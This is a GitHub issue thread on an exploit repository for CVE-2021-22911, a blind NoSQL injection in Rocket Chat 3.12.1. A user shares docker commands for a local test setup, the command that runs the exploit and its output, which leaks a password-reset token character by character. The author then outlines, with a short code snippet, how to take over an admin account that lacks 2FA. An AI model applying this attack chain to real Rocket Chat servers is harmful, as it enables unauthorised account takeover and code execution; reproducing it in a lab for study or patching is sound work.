search

CsEnox / CVE-2021-22911

Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1
55 stars 8 forks source link

is section Environment complete? #1

Closed RegularITCat closed 3 years ago

RegularITCat commented 3 years ago

I tried to check your exploit.

As said in Environment section of Readme, builded test environment with 

docker run --name db -d mongo:3.6 --smallfiles --replSet rs0 --oplogSize 128
docker exec -ti db mongo --eval "printjson(rs.initiate())"
docker run --name rocketchat -p 80:3000 --link db --env ROOT_URL=http://localhost --env MONGO_OPLOG_URL=mongodb://db:27017/local -d rocket.chat:3.12.1

after that, execute script as

python3 exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://localhost:80"

script ended with

[+] Resetting user@rocket.local password
[+] Password Reset Email Sent
Got: U
Got: UN
Got: UNU
Got: UNUg
Got: UNUg2
Got: UNUg2f
Got: UNUg2fJ
Got: UNUg2fJ-
Got: UNUg2fJ-I
Got: UNUg2fJ-IE
Got: UNUg2fJ-IE6
Got: UNUg2fJ-IE6P
Got: UNUg2fJ-IE6Pt
Got: UNUg2fJ-IE6Ptc
Got: UNUg2fJ-IE6Ptco
Got: UNUg2fJ-IE6PtcoK
Got: UNUg2fJ-IE6PtcoKd
Got: UNUg2fJ-IE6PtcoKdN
Got: UNUg2fJ-IE6PtcoKdNP
Got: UNUg2fJ-IE6PtcoKdNPm
Got: UNUg2fJ-IE6PtcoKdNPmg
Got: UNUg2fJ-IE6PtcoKdNPmg1
Got: UNUg2fJ-IE6PtcoKdNPmg1K
Got: UNUg2fJ-IE6PtcoKdNPmg1Kv
Got: UNUg2fJ-IE6PtcoKdNPmg1Kvl
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlX
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXw
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-c
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ce
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceY
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYN
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNU
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUy
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyG
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGf
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfR
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJ
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJL
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLI
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr7
[+] Got token : UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr7
[-] Wrong token

Do I understand correctly that the problem is that I didn't fill the Rocket Chat database with users?

Сould you add the necessary comments to the Environment section to fully recreate the exploitation?

p.s. i'm sorry for being dummy xd

p.p.s. and great work btw

CsEnox commented 3 years ago

There are more things to do sir.

NOTE: If the admin doesn't have 2FA u can customize the code 1) Send forget password mail 2) Get resettoken for admin 3) Change the password using the reset token retrieved

# Admin Account Takover [ No 2fa ]
forgotpassword(adminmail,target)
token = resettoken(target)
changingpassword(target,token)

I should probably add this information to environment setup.

CsEnox commented 3 years ago

@RegularITCat if u got any more questions you can dm me on discord 😄 Enox#4458